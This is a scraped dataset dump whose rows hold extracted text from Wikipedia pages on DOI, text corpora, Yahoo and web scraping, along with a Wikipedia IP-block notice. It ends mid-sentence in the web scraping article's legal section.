451 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Doi_(identifier) | A digital object identifier (DOI) is a persistent identifier or handle used to uniquely identify various objects, standardized by the International Organization for Standardization (ISO). 1 DOIs are an implementation of the Handle System; 2 3 they also fit within the URI system (Uniform Resource Identifier). They are widely used to identify academic, professional, and government information, such as journal articles, research reports, data sets, and official publications. A DOI aims to resolve to its target, the information object to which the DOI refers. This is achieved by binding the DOI to metadata about the object, such as a URL where the object is located. Thus, by being actionable and interoperable, a DOI differs from ISBNs or ISRCs which are identifiers only. The DOI system uses the indecs Content Model for representing metadata. The DOI for a document remains fixed over the lifetime of the document, whereas its location and other metadata may change. Referring to an online document by its DOI should provide a more stable link than directly using its URL. But if its URL changes, the publisher must update the metadata for the DOI to maintain the link to the URL. 4 5 6 It is the publisher's responsibility to update the DOI database. If they fail to do so, the DOI resolves to a dead link, leaving the DOI useless. 7 The developer and administrator of the DOI system is the International DOI Foundation (IDF), which introduced it in 2000. 8 Organizations that meet the contractual obligations of the DOI system and are willing to pay to become a member of the system can assign DOIs. 9 The DOI system is implemented through a federation of registration agencies coordinated by the IDF. 10 By late April 2011 more than 50 million DOI names had been assigned by some 4,000 organizations, 11 and by April 2013 this number had grown to 85 million DOI names assigned through 9,500 organizations citation needed . A DOI is a type of Handle System handle, which takes the form of a character string divided into two parts, a prefix and a suffix, separated by a slash. The prefix identifies the registrant of the identifier and the suffix is chosen by the registrant and identifies the specific object associated with that DOI. Most legal Unicode characters are allowed in these strings, which are interpreted in a case-insensitive manner. The prefix usually takes the form 10.NNNN, where NNNN is a number greater than or equal to 1000, whose limit depends only on the total number of registrants. 12 13 The prefix may be further subdivided with periods, like 10.NNNN.N. 14 For example, in the DOI name 10.1000 182, the prefix is 10.1000 and the suffix is 182. The "10" part of the prefix distinguishes the handle as part of the DOI namespace, as opposed to some other Handle System namespace, A and the characters 1000 in the prefix identify the registrant; in this case the registrant is the International DOI Foundation itself. 182 is the suffix, or item ID, identifying a single object (in this case, the latest version of the DOI Handbook). DOI names can identify creative works (such as texts, images, audio or video items, and software) in both electronic and physical forms, performances, and abstract works 15 such as licenses, parties to a transaction, etc. The names can refer to objects at varying levels of detail: thus DOI names can identify a journal, an individual issue of a journal, an individual article in the journal, or a single table in that article. The choice of level of detail is left to the assigner, but in the DOI system it must be declared as part of the metadata that is associated with a DOI name, using a data dictionary based on the indecs Content Model. The official DOI Handbook explicitly states that DOIs should be displayed on screens and in print in the format doi:10.1000 182. 16 Contrary to the DOI Handbook, CrossRef, a major DOI registration agency, recommends displaying a URL (for example, https: doi.org 10.1000 182) instead of the officially specified format (for example, doi:10.1000 182) 17 18 This URL is persistent (there is a contract that ensures persistence in the DOI.ORG domain), so it is a PURL—providing the location of an HTTP proxy server which will redirect web accesses to the correct online location of the linked item. 9 19 The CrossRef recommendation is primarily based on the assumption that the DOI is being displayed without being hyperlinked to its appropriate URL—the argument being that without the hyperlink it is not as easy to copy-and-paste the full URL to actually bring up the page for the DOI, thus the entire URL should be displayed, allowing people viewing the page containing the DOI to copy-and-paste the URL, by hand, into a new window tab in their browser in order to go to the appropriate page for the document the DOI represents. 20 Since DOI is a namespace within the Handle System, it is semantically correct to represent it as the URI info:doi 10.1000 182. Major content of the DOI system currently includes: In the Organisation for Economic Co-operation and Development's publication service OECD iLibrary, each table or graph in an OECD publication is shown with a DOI name that leads to an Excel file of data underlying the tables and graphs. Further development of such services is planned. 22 Other registries include Crossref and the multilingual European DOI Registration Agency (mEDRA). 23 Since 2015, RFCs can be referenced as doi:10.17487 rfc.... 24 The IDF designed the DOI system to provide a form of persistent identification, in which each DOI name permanently and unambiguously identifies the object to which it is associated (although when the publisher of a journal changes, sometimes all the DOIs will be changed, with the old DOIs no longer working). It also associates metadata with objects, allowing it to provide users with relevant pieces of information about the objects and their relationships. Included as part of this metadata are network actions that allow DOI names to be resolved to web locations where the objects they describe can be found. To achieve its goals, the DOI system combines the Handle System and the indecs Content Model with a social infrastructure. The Handle System ensures that the DOI name for an object is not based on any changeable attributes of the object such as its physical location or ownership, that the attributes of the object are encoded in its metadata rather than in its DOI name, and that no two objects are assigned the same DOI name. Because DOI names are short character strings, they are human-readable, may be copied and pasted as text, and fit into the URI specification. The DOI name-resolution mechanism acts behind the scenes, so that users communicate with it in the same way as with any other web service; it is built on open architectures, incorporates trust mechanisms, and is engineered to operate reliably and flexibly so that it can be adapted to changing demands and new applications of the DOI system. 25 DOI name-resolution may be used with OpenURL to select the most appropriate among multiple locations for a given object, according to the location of the user making the request. 26 However, despite this ability, the DOI system has drawn criticism from librarians for directing users to non-free copies of documents, that would have been available for no additional fee from alternative locations. 27 The indecs Content Model as used within the DOI system associates metadata with objects. A small kernel of common metadata is shared by all DOI names and can be optionally extended with other relevant data, which may be public or restricted. Registrants may update the metadata for their DOI names at any time, such as when publication information changes or when an object moves to a different URL. The International DOI Foundation (IDF) oversees the integration of these technologies and operation of the system through a technical and social infrastructure. The social infrastructure of a federation of independent registration agencies offering DOI services was modelled on existing successful federated deployments of identifiers such as GS1 and ISBN. A DOI name differs from commonly used Internet pointers to material, such as the Uniform Resource Locator (URL), in that it identifies an object itself as a first-class entity, rather than the specific place where the object is located at a certain time. It implements the Uniform Resource Identifier (Uniform Resource Name) concept and adds to it a data model and social infrastructure. 28 A DOI name also differs from standard identifier registries such as the ISBN, ISRC, etc. The purpose of an identifier registry is to manage a given collection of identifiers, whereas the primary purpose of the DOI system is to make a collection of identifiers actionable and interoperable, where that collection can include identifiers from many other controlled collections. 29 The DOI system offers persistent, semantically interoperable resolution to related current data and is best suited to material that will be used in services outside the direct control of the issuing assigner (e.g., public citation or managing content of value). It uses a managed registry (providing both social and technical infrastructure). It does not assume any specific business model for the provision of identifiers or services and enables other existing services to link to it in defined ways. Several approaches for making identifiers persistent have been proposed. The comparison of persistent identifier approaches is difficult because they are not all doing the same thing. Imprecisely referring to a set of schemes as "identifiers" does not mean that they can be compared easily. Other "identifier systems" may be enabling technologies with low barriers to entry, providing an easy to use labeling mechanism that allows anyone to set up a new instance (examples include Persistent Uniform Resource Locator (PURL), URLs, Globally Unique Identifiers (GUIDs), etc.), but may lack some of the functionality of a registry-controlled scheme and will usually lack accompanying metadata in a controlled scheme. The DOI system does not have this approach and should not be compared directly to such identifier schemes. Various applications using such enabling technologies with added features have been devised that meet some of the features offered by the DOI system for specific sectors (e.g., ARK). A DOI name does not depend on the object's location and, in this way, is similar to a Uniform Resource Name (URN) or PURL but differs from an ordinary URL. URLs are often used as substitute identifiers for documents on the Internet although the same document at two different locations has two URLs. By contrast, persistent identifiers such as DOI names identify objects as first class entities: two instances of the same object would have the same DOI name. DOI name resolution is provided through the Handle System, developed by Corporation for National Research Initiatives, and is freely available to any user encountering a DOI name. Resolution redirects the user from a DOI name to one or more pieces of typed data: URLs representing instances of the object, services such as e-mail, or one or more items of metadata. To the Handle System, a DOI name is a handle, and so has a set of values assigned to it and may be thought of as a record that consists of a group of fields. Each handle value must have a data type specified in its type field, which defines the syntax and semantics of its data. While a DOI persistently and uniquely identifies the object to which it is assigned, DOI resolution may not be persistent, due to technical and administrative issues. To resolve a DOI name, it may be input to a DOI resolver, such as doi.org. Another approach, which avoids typing or cutting-and-pasting into a resolver is to include the DOI in a document as a URL which uses the resolver as an HTTP proxy, such as https: doi.org (preferred) 30 or http: dx.doi.org , both of which support HTTPS. For example, the DOI 10.1000 182 can be included in a reference or hyperlink as https: doi.org 10.1000 182. This approach allows users to click on the DOI as a normal hyperlink. Indeed, as previously mentioned, this is how CrossRef recommends that DOIs always be represented (preferring HTTPS over HTTP), so that if they are cut-and-pasted into other documents, emails, etc., they will be actionable. Other DOI resolvers and HTTP Proxies include the Handle System and PANGAEA. At the beginning of the year 2016, a new class of alternative DOI resolvers was started by http: doai.io. This service is unusual in that it tries to find a non-paywalled (often author archived) version of a title and redirects the user to that instead of the publisher's version. 31 32 Since then, other open-access favoring DOI resolvers have been created, notably https: oadoi.org in October 2016 33 (later Unpaywall). While traditional DOI resolvers solely rely on the Handle System, alternative DOI resolvers first consult open access resources such as BASE (Bielefeld Academic Search Engine). 31 33 An alternative to HTTP proxies is to use one of a number of add-ons and plug-ins for browsers, thereby avoiding the conversion of the DOIs to URLs, 34 which depend on domain names and may be subject to change, while still allowing the DOI to be treated as a normal hyperlink. A disadvantage of this approach for publishers is that, at least at present, most users will be encountering the DOIs in a browser, mail reader, or other software which does not have one of these plug-ins installed. The International DOI Foundation (IDF), a non-profit organisation created in 1997, is the governance body of the DOI system. 35 It safeguards all intellectual property rights relating to the DOI system, manages common operational features, and supports the development and promotion of the DOI system. The IDF ensures that any improvements made to the DOI system (including creation, maintenance, registration, resolution and policymaking of DOI names) are available to any DOI registrant. It also prevents third parties from imposing additional licensing requirements beyond those of the IDF on users of the DOI system. The IDF is controlled by a Board elected by the members of the Foundation, with an appointed Managing Agent who is responsible for co-ordinating and planning its activities. Membership is open to all organizations with an interest in electronic publishing and related enabling technologies. The IDF holds annual open meetings on the topics of DOI and related issues. Registration agencies, appointed by the IDF, provide services to DOI registrants: they allocate DOI prefixes, register DOI names, and provide the necessary infrastructure to allow registrants to declare and maintain metadata and state data. Registration agencies are also expected to actively promote the widespread adoption of the DOI system, to cooperate with the IDF in the development of the DOI system as a whole, and to provide services on behalf of their specific user community. A list of current RAs is maintained by the International DOI Foundation. The IDF is recognized as one of the federated registrars for the Handle System by the DONA Foundation (of which the IDF is a board member), and is responsible for assigning Handle System prefixes under the top-level 10 prefix. 36 Registration agencies generally charge a fee to assign a new DOI name; parts of these fees are used to support the IDF. The DOI system overall, through the IDF, operates on a not-for-profit cost recovery basis. The DOI system is an international standard developed by the International Organization for Standardization in its technical committee on identification and description, TC46 SC9. 37 The Draft International Standard ISO DIS 26324, Information and documentation Digital Object Identifier System met the ISO requirements for approval. The relevant ISO Working Group later submitted an edited version to ISO for distribution as an FDIS (Final Draft International Standard) ballot, 38 which was approved by 100% of those voting in a ballot closing on 15 November 2010. 39 The final standard was published on 23 April 2012. 1 DOI is a registered URI under the info URI scheme specified by IETF RFC 4452. info:doi is the infoURI Namespace of Digital Object Identifiers. 40 The DOI syntax is a NISO standard, first standardized in 2000, ANSI NISO Z39.84 2005 Syntax for the Digital Object Identifier. 41 The maintainers of the DOI system have deliberately not registered a DOI namespace for URNs, stating that: URN architecture assumes a DNS-based Resolution Discovery Service (RDS) to find the service appropriate to the given URN scheme. However no such widely deployed RDS schemes currently exist.... DOI is not registered as a URN namespace, despite fulfilling all the functional requirements, since URN registration appears to offer no advantage to the DOI System. It requires an additional layer of administration for defining DOI as a URN namespace (the string urn:doi:10.1000 1 rather than the simpler doi:10.1000 1) and an additional step of unnecessary redirection to access the resolution service, already achieved through either http proxy or native resolution. If RDS mechanisms supporting URN specifications become widely available, DOI will be registered as a URN. |
452 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Text_corpus | In linguistics and natural language processing, a corpus (pl.: corpora) or text corpus is a dataset, consisting of natively digital and older, digitalized, language resources, either annotated or unannotated. Annotated, they have been used in corpus linguistics for statistical hypothesis testing, checking occurrences or validating linguistic rules within a specific language territory. In search technology, a corpus is the collection of documents which is being searched. A corpus may contain texts in a single language (monolingual corpus) or text data in multiple languages (multilingual corpus). In order to make the corpora more useful for doing linguistic research, they are often subjected to a process known as annotation. An example of annotating a corpus is part-of-speech tagging, or POS-tagging, in which information about each word's part of speech (verb, noun, adjective, etc.) is added to the corpus in the form of tags. Another example is indicating the lemma (base) form of each word. When the language of the corpus is not a working language of the researchers who use it, interlinear glossing is used to make the annotation bilingual. Some corpora have further structured levels of analysis applied. In particular, smaller corpora may be fully parsed. Such corpora are usually called Treebanks or Parsed Corpora. The difficulty of ensuring that the entire corpus is completely and consistently annotated means that these corpora are usually smaller, containing around one to three million words. Other levels of linguistic structured analysis are possible, including annotations for morphology, semantics and pragmatics. Corpora are the main knowledge base in corpus linguistics. Other notable areas of application include: |
453 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=8 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
454 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Yahoo! | Yahoo ( j hu , styled yahoo in its logo) 4 5 is an American web services provider. It is headquartered in Sunnyvale, California, and operated by the namesake company Yahoo Inc., which is 90% owned by investment funds managed by Apollo Global Management and 10% by Verizon Communications. It provides a web portal, search engine Yahoo Search, and related services, including My Yahoo , Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Sports and its advertising platform, Yahoo Native. Yahoo was established by Jerry Yang and David Filo in January 1994 and was one of the pioneers of the early Internet era in the 1990s. 6 However, its use declined in the 2010s as some of its services were discontinued, and it lost market share to Facebook and Google. 7 8 In January 1994, Jerry Yang and David Filo were electrical engineering graduate students at Stanford University, when they created a website named "Jerry and David's guide to the World Wide Web". 9 10 11 12 The site was a human-edited web directory, organized in a hierarchy, as opposed to a searchable index of pages. In March 1994, "Jerry and David's Guide to the World Wide Web" was renamed "Yahoo and became known as the Yahoo Directory. 10 13 14 15 16 The "yahoo.com" domain was registered on January 18, 1995. 17 The word "yahoo" is a backronym for "Yet Another Hierarchically Organized Oracle" 18 or "Yet Another Hierarchical Officious Oracle". 19 The term "hierarchical" described how the Yahoo database was arranged in layers of subcategories. The term "oracle" was intended to mean "source of truth and wisdom", and the term "officious", rather than being related to the word's normal meaning, described the many office workers who would use the Yahoo database while surfing from work. 20 However, Filo and Yang insist they mainly selected the name because they liked the slang definition of a "yahoo" (used by college students in David Filo's native Louisiana in the late 1980s and early 1990s to refer to an unsophisticated, rural Southerner): "rude, unsophisticated, uncouth. 21 This meaning derives from the Yahoo race of fictional beings from Gulliver's Travels. Yahoo was incorporated on March 2, 1995. In 1995, a search engine function, called Yahoo Search, was introduced. This allowed users to search Yahoo Directory. 22 23 Yahoo soon became the first popular online directory and search engine on the World Wide Web. 24 Yahoo grew rapidly throughout the 1990s. Yahoo became a public company via an initial public offering in April 1996 and its stock price rose 600% within two years. 25 Like many search engines and web directories, Yahoo added a web portal, putting it in competition with services including Excite, Lycos, and America Online. 26 By 1998, Yahoo was the most popular starting point for web users, 27 and the human-edited Yahoo Directory the most popular search engine, 15 receiving 95 million page views per day, triple that of rival Excite. 25 It also made many high-profile acquisitions. Yahoo began offering free e-mail from October 1997 after the acquisition of RocketMail, which was then renamed to Yahoo Mail. 28 In 1998, Yahoo replaced AltaVista as the crawler-based search engine underlying the Directory with Inktomi. 29 Yahoo's two biggest acquisitions were made in 1999: Geocities for $3.6 billion 30 and Broadcast.com for $5.7 billion. 31 Its stock price skyrocketed during the dot-com bubble, closing at an all-time high of $118.75 share on January 3, 2000. However, after the dot-com bubble burst, it reached a post-bubble low of $8.11 on September 26, 2001. 32 Yahoo began using Google for search in June 2000. 33 34 Over the next four years, it developed its own search technologies, which it began using in 2004 partly using technology from its $280 million acquisition of Inktomi in 2002. 35 In response to Google's Gmail, Yahoo began to offer unlimited email storage in 2007. In 2008, the company laid off hundreds of people as it struggled from competition. 36 In February 2008, Microsoft made an unsolicited bid to acquire Yahoo for $44.6 billion. 37 38 Yahoo rejected the bid, claiming that it "substantially undervalues" the company and was not in the interest of its shareholders. Although Microsoft increased its bid to $47 billion, Yahoo insisted on another 10% increase to the offer and Microsoft cancelled the offer in May 2008. 39 40 41 42 Carol Bartz, who had no previous experience in Internet advertising, replaced Yang as CEO in January 2009. 43 44 In September 2011, after failing to meet targets, she was fired by chairman Roy J. Bostock; CFO Tim Morse was named as Interim CEO of the company. 45 46 In April 2012, after the appointment of Scott Thompson as CEO, several key executives resigned, including chief product officer Blake Irving. 47 48 On April 4, 2012, Yahoo announced 2,000 layoffs, 49 or about 14% of its 14,100 workers by the end of year, expected to save around $375 million annually. 50 In an email sent to employees in April 2012, Thompson reiterated his view that customers should come first at Yahoo. He also completely reorganized the company. 51 On May 13, 2012, Thompson was fired and was replaced on an interim basis by Ross Levinsohn, recently appointed head of Yahoo's new Media group. Several associates of Third Point Management, including Daniel S. Loeb were nominated to the board of directors. 52 51 53 54 Thompson's total compensation for his 130 day tenure with Yahoo was at least $7.3 million. 55 On July 15, 2012, Marissa Mayer was appointed president and CEO of Yahoo, effective July 17, 2012. 56 57 In June 2013, Yahoo acquired blogging site Tumblr for $1.1 billion in cash, with Tumblr's CEO and founder David Karp continuing to run the site. 58 59 60 61 In July 2013, Yahoo announced plans to open an office in San Francisco. 62 On August 2, 2013, Yahoo acquired Rockmelt; its staff was retained, but all of its existing products were terminated. 63 Data collated by comScore during July 2013 revealed that, during the month, more people in the U.S. visited Yahoo websites than Google; the first time that Yahoo outperformed Google since 2011. 64 The data did not count mobile usage, nor Tumblr. 65 Mayer also hired Katie Couric to be the anchor of a new online news operation and started an online food magazine. However, by January 2014, doubts about Mayer's progress emerged when Mayer fired her own first major hire, Henrique de Castro. 66 On December 12, 2014, Yahoo acquired video advertising provider BrightRoll for $583 million. 67 On November 21, 2014, Yahoo acquired Cooliris. 68 In August 2023, it was announced Yahoo had acquired the San Francisco-headquartered social investing platform, Commonstock. 69 In April 2024, it was announced Yahoo had acquired the AI-driven news aggregator app, Artifact. 70 By December 2015, Mayer was criticized as performance declined. 71 72 73 74 Mayer was ranked as the least likable CEO in tech. 75 76 On February 2, 2016, Mayer announced layoffs amounting to 15% of the Yahoo workforce. 77 On July 25, 2016, Verizon Communications announced the acquisition of Yahoo's core Internet business for $4.83 billion. 78 79 80 81 The deal excluded Yahoo's 15% stake in Alibaba Group and 35.5% stake in Yahoo Japan. 82 83 On February 21, 2017, as a result of the Yahoo data breaches, Verizon lowered its purchase price for Yahoo by $350 million and reached an agreement to share liabilities regarding the data breaches. 84 85 On June 13, 2017, Verizon completed the acquisition of Yahoo and Marissa Mayer resigned. 86 87 Yahoo, AOL, and HuffPost were to continue operating under their own names, under the umbrella of a new company, Oath Inc., later called Verizon Media. 88 89 The parts of the original Yahoo Inc. which were not purchased by Verizon Communications were renamed Altaba, which was later liquidated, making a final distribution in October 2020. 90 In September 2021, investment funds managed by Apollo Global Management acquired 90% of Yahoo. 91 92 In November 2021, Yahoo announced that it was ending operations in mainland China due to the increasingly challenging business and legal environment. 93 Previously, the company discontinued China Yahoo Mail on August 20, 2013. 94 In 2023, Yahoo announced that it would cut 20% of its workforce. The move followed mass layoffs from other tech giants including Google, Microsoft, Twitter, Inc, Meta, and Amazon. The company is set to lay off roughly 1,000 staff members of their 8,600 workers. 95 Eleven chief executives and interim leaders have led the Yahoo companies since 1995. They are: For a list of all current and defunct services offered by Yahoo, see List of Yahoo owned sites and services. On September 22, 2016, Yahoo disclosed a data breach that occurred in late 2014, in which information associated with at least 500 million user accounts, 101 102 one of the largest breaches reported to date. 103 The United States indicted four men, including two employees of Russia's Federal Security Service (FSB), for their involvement in the hack. 104 105 On December 14, 2016, the company revealed that another separate data breach had occurred in 2014, with hackers obtaining sensitive account information, including security questions, to at least one billion accounts. 106 The company stated that hackers had utilized stolen internal software to forge HTTP cookies. 107 108 On October 3, 2017, the company stated that all 3 billion of its user accounts were affected by the August 2013 theft. 109 110 111 112 113 On November 30, 2009, Yahoo was criticized by the Electronic Frontier Foundation for sending a DMCA notice to whistleblower website "Cryptome" for publicly posting details, prices, and procedures on obtaining private information pertaining to Yahoo's subscribers. 114 After some concerns over censorship of private emails regarding a website affiliated with Occupy Wall Street protests were raised, Yahoo responded with an apology and explained it as an accident. 115 116 117 On September 11, 2001, Yahoo announced its partnership with FIFA for the 2002 FIFA World Cup and 2006 FIFA World Cup tournaments. It was one of FIFA's 15 partners at the tournaments. The deal included co-branding the organization's websites. 118 Yahoo sponsored the 2012 Sundance Film Festival. 119 NBC Sports Group aligned with Yahoo Sports the same year with content and program offerings on mobile and desktop platforms. 120 Yahoo announced television video partnerships in 2013 with Cond Nast, 121 WWE, ABC NEWS, and CNBC. 122 Yahoo entered into a 10 year collaboration in 2014, as a founding partner of Levi's Stadium, home of the San Francisco 49ers. 123 The National Basketball Association partnered with Yahoo Sports to stream games, offer virtual and augmented-reality fan experiences, and in 2018 NBA League Pass. 124 125 Yahoo Sportsbook launched in November 2019, a collaboration with BetMGM. 126 127 BuzzFeed acquired HuffPost from Yahoo in November 2020, in a stock deal with Yahoo as a minority shareholder. 128 129 The NFL partnered with Yahoo in 2020, to introduce a new "Watch Together" function on the Yahoo Sports app for interactive co-viewing through a synchronized livestream of local and primetime NFL games. 130 The Paley Center for Media collaborated with Verizon Media to exclusively stream programs on Yahoo platforms beginning in 2020. 131 Yahoo became the main sponsor for the Pramac Racing team and the first title sponsor for the 2021 ESport MotoGP Championship season. 132 Yahoo, the official partner for the September 2021 New York Fashion Week event also unveiled sponsorship for the Rebecca Minkoff collection via a NFT space. 133 In September 2021, it was announced that Yahoo partnered with Shopify, connecting the e-commerce merchants on Yahoo Finance, AOL and elsewhere. 134 |
455 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-2 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually 